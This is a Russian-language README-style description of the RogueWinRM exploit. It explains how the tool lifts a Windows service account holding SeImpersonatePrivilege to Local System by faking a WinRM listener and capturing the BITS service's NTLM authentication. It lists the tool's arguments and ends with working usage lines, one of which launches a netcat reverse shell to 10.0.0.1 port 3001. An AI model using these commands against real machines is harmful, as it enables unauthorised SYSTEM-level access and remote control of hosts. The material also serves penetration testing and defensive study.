
Повышение привилегий на локальном уровне в Windows от учетной записи службы до System
RogueWinRM — это эксплойт для локального повышения привилегий, который позволяет подняться от учётной записи службы (с привилегией SeImpersonatePrivilege) до учётной записи Local System, если служба WinRM не запущена (по умолчанию на Win10, но НЕ на Windows Server 2019).
Кратко: он прослушивает входящие соединения на порту 5985, имитируя настоящую службу WinRM.
Это всего лишь минимальный веб-сервер, который пытается согласовать NTLM-аутентификацию с любым сервисом, пытающимся подключиться к этому порту.
Затем запускается служба BITS (работающая как Local System), и она попытается аутентифицироваться на нашем подставном слушателе. После успешной аутентификации мы можем выполнить олицетворение пользователя Local System и запустить произвольный процесс с этими привилегиями.
Полное техническое описание этой уязвимости можно найти по ссылке --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Запуск интерактивной командной строки:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Запуск реверс-шелла через netcat:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"